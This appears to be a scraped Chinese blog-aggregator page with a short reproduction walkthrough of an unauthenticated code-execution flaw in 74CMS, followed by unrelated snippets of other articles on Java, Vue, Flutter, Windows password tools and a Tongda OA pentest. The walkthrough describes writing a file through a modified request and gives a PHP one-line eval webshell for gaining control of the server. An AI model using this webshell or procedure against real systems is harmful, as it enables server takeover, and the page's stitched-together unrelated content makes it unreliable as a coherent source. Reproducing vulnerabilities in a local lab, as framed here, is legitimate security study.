漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。
下载地址:
http://www.74cms.com/download/index.html
下载后解压到phpstudy的根目录www里面
输入网址,http://127.0.0.1/upload/install.php
一直点击下一步,输入数据库名称和密码
进入系统
抓个包看看
将包中的domain后面的改成如下
base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode
然后我们点击send进行发包,看到返回后status等于1,说明状态码正常,发包成功
接下来激活这个发包内容,payload:
127.0.0.1/upload/Application/Common/Conf/url.php
打开看看
发现1.php雀食被写进去了
接下来就是访问1.php了,payload;
127.0.0.1/upload/Application/Common/Conf/1.php
可以看到成功访问phpinfo,说明漏洞存在且被利用wo
我们这次用的是phpinfo,危害不大,如果我们使用一句话木马,就可以造成更大的危害
一句话木马:<?php @eval($_POST['zrtonnn']);?>
将木马用decode改成base64,重复上述操作,即可得到权限
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/357952.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!相关文章
给Java程序猿们推荐一些值得一看的好书
学习的最好途径就是看书 "学习的最好途径就是看书",这是我自己学习并且小有了一定的积累之后的第一体会。个人认为看书有两点好处: 1、能出版出来的书一定是经过反复的思考、雕琢和审核的,因此从专业性的角度来说,一本好…
pr基本图形模板无法使用_PR模板21个时尚排版竖屏封面图形标题动画【资源分享1218】...
AE特效PR剪辑C4D动画影视后期全世界只有不到1%的人关注了你是个很特别的人AE影视后期定期推送「AEPRC4D 影视特效合成 婚庆剪辑调色 电视广告包装 微电影制作 SpeedGrade达芬奇专业调色 摄影等」打造影视后期高端学习平台影视后期 ID:AEPRC4D6【PR模板信息】适用软件…
前端全栈大佬是如何使用javaScript实现一个无缝轮播(最终版)
效果图: 代码如下:
<!DOCTYPE html>
<html>
<head lang="en"><meta charset="UTF-8"><title>优化后的无缝轮播图</title><style>body{-webkit-user-select: none; }ul,li{list-style: none;}#outer{width: 4…
通达OA系统11.2漏洞
以通达OA系统11.2版本为案例的Web渗透
1. 渗透背景:2. 存在漏洞3. 漏洞复现3.1 前台任意用户登录漏洞3.1.1 漏洞原理:3.1.2 手工抓包复现:3.1.3 POC自动获取复现: 3.2 前台未授权访问漏洞3.3 管理后台文件上传漏洞3.4 后台SQL注入…
刷新本地的DNS缓存数据
ipconfig /flushdns”执行,刷新本地的DNS缓存数据。 ipconfig /displaydns 查看本地DNS缓存记录的命令为:ipconfig /displaydns。你将会看到包括本地Hosts文件记录和已访问过的站点在内的所有DNS记录。转载于:https://www.cnblogs.com/u0mo5/p/5010…
小白如何从零开始设计并开发一个微信小程序?
背景:微信小程序的出现,让更多的中小型企业初期不再以APP为首选,小程序的天然优势让他备受关注,也因此诞生了专门的小程序开发岗位,让前端有机会继续蚕食其他岗位的份额。 但微信小程序也会很多缺点,最大的就是监管太霸道,各种限制行业进入和权限,未开发的行业还是不能…
mvc2 mvc_每个人都知道MVC…
mvc2 mvc从一个最近的博客中,您可能会发现我最近一直在进行一些采访,就像他们对Web应用程序开发人员所说的那样,我问的一个问题是“您能解释一下MVC模式是什么吗?”,值得赞扬的是,每个候选人知道答案。 对于…
移动端 长按事件_Flutter事件监听
一. 事件监听 在大前端的开发中,必然存在各种各样和用户交互的情况:比如手指点击、手指滑动、双击、长按等等。在Flutter中,手势有两个不同的层次:第一层:原始指针事件(Pointer Events):描述了屏幕上由触摸…
在CSDN的博文中如何添加博主名片
前言:以前看到很多大佬博文中都有自己的名片,我以为是他们自己打字打上去的,自己打上去样式却不理想。今天终于发现了新大陆。分享给你们。 效果图: 设置方法如图:找到创作权益——博主名片——展示博文详情页…
Ajax.BeginForm无法调用 ajaxOptions的js函数
使用ajax.beginForm无法调用ajaxOptions的js函数的原因,一般都是缺少以下2个JS文件: 1,Install-Package jQuery –version 1.10.22,Install-Package Microsoft.jQuery.Unobtrusive.Ajax –version 3.0.0 添加方法: 【工…
将非事务性资源绑定到JTA事务中的几种模式
我最近发表了一篇有关如何将非事务性资源(如Web服务/微服务)绑定到全局分布式事务中的文章,以便自动处理恢复。 多年来,我经常不得不将“非事务性”系统集成到Java EE应用程序服务器中,而数据一致性通常是讨论的话题&a…
vscode中文设置不生效_VSCode详细安装教程
1.下载https://code.visualstudio.com/download 是Microsoft(微软的产品)User Installer版:会安装在当前计算机帐户目录,意味着如果使用另一个帐号登陆计算机将无法使用别人安装的vscode。System Installer版:安装在非用户目录,例…
windows查看密码工具
windows查看密码工具windows前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻…
孙叫兽VUE学习笔记总结(值得收藏),很全很详细!!!
官方文档:http://vuejs.org/v2/guide/syntax.html 中文文档: https://cn.vuejs.org/v2/guide/syntax.html Vue (读音 /vjuː/,类似于 view) 是一套用于构建用户界面的渐进式框架。 与其它大型框架不同的是,Vue 被设计为可以自底向上逐层应用。 Vue 的核心库只关注视图层,不…
hashCode之二--Java:重写equals()和hashCode()
以下内容总结自《Effective Java》。1.何时需要重写equals()当一个类有自己特有的“逻辑相等”概念(不同于对象身份的概念)。2.设计equals()[1]使用instanceof操作符检查“实参是否为正确的类型”。[2]对于类中的每一个“关键域”,检查实参中…
毛绒材质渲染_学室内设计必进,建模渲染那都不是事儿
近年来,室内设计从业人员需求量和薪酬持续增长带来的是室内设计行业的飞速发展,而设计能力也成为“创新与创造”的不可或缺。设计能力是多方面能力的综合体现而室内效果图作为设计成果的最主要表现手段,是最基础也是最重要的技能之一。那么持…
2020年末总结,脚踏实地,一步一个脚印——致敬自己一年的心酸历程
摘要:恰逢官方征文,谨以此篇记录自己一年的心酸历程与前端知识的感悟。 目录 在时代工场的主要工作
我为什么从时代工场离职?
第六章 面向对象(下)
1. 不上机,判断下面程序的输出结果 class X {Y b new Y();X() {System.out.print("X");}
}
class Y {Y() {System.out.print("Y");}
}
public class Z extends X {Y y new Y();Z() {System.out.print("Z");}public static void mai…
如何使用Java 8函数式编程生成字母序列
我偶然发现了用户“ mip”一个有趣的堆栈溢出问题 。 问题是: 我正在寻找一种生成字母序列的方法: A, B, C, ..., Z, AA, AB, AC, ..., ZZ.可以很快将其识别为Excel电子表格的标题,正是这样: 到目前为止,没有答案使…
maven 打包指定依赖包_[Maven]-Maven基础-01-基础概念
Maven基础1.基础概念Maven基础概念什么是Maven什么是理想的项目构建?高度自动化,跨平台,可重用的组件,标准化的什么是依赖?为什么要进行依赖管理?自动下载,统一依赖管理有哪些项目信息ÿ…